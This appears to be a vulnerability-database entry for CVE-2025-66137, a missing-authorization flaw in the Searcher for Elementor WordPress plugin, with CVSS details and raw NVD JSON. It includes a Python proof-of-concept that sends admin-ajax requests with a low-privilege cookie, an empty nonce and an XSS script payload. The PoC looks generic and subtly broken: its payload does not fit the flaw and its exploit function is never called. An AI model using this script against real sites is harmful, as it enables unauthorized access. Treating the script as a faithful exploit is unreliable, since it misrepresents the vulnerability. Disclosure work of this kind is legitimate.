Security Vulnerability Report
中文
CVE-2025-66137 CVSS 5.4 MEDIUM

CVE-2025-66137

Published: 2026-01-22 17:16:01
Last Modified: 2026-04-27 18:16:38

Description

Missing Authorization vulnerability in merkulove Searcher for Elementor searcher-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Searcher for Elementor: from n/a through <= 1.0.3.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Searcher for Elementor <= 1.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-66137 PoC - Searcher for Elementor Broken Access Control # Target: WordPress site with Searcher for Elementor plugin <= 1.0.3 target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php" # Authenticated low-privilege user session cookies = { "wordpress_test_cookie": "WP+Cookie+check", "wordpress_logged_in_user": "your_session_cookie" } # Step 1: Identify if the plugin is installed and vulnerable def check_vulnerability(): params = { "action": "searcher_elementor_ajax_search", "search": "test", "security": "" } try: response = requests.get(target_url, params=params, cookies=cookies) # If we get a response without proper authorization check, vulnerability exists if response.status_code == 200: print(f"[+] Plugin is installed, checking for access control issue...") print(f"[+] Response: {response.text[:500]}") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") return False # Step 2: Exploit the broken access control def exploit_access_control(): # This payload attempts to access admin-only searcher settings params = { "action": "searcher_elementor_ajax_search", "search": "<script>alert('XSS')</script>", "searcher_options": "1" } response = requests.post(target_url, data=params, cookies=cookies) print(f"[+] Exploit response status: {response.status_code}") print(f"[+] Response content: {response.text}") if __name__ == "__main__": print("CVE-2025-66137 PoC - Searcher for Elementor <= 1.0.3") print("Type: Missing Authorization / Broken Access Control") check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66137", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:00.600", "lastModified": "2026-04-27T18:16:37.673", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Searcher for Elementor searcher-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Searcher for Elementor: from n/a through <= 1.0.3."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en merkulove Searcher para Elementor searcher-elementor permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Searcher para Elementor: desde n/a hasta &lt;= 1.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/searcher-elementor/vulnerability/wordpress-searcher-for-elementor-plugin-1-0-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}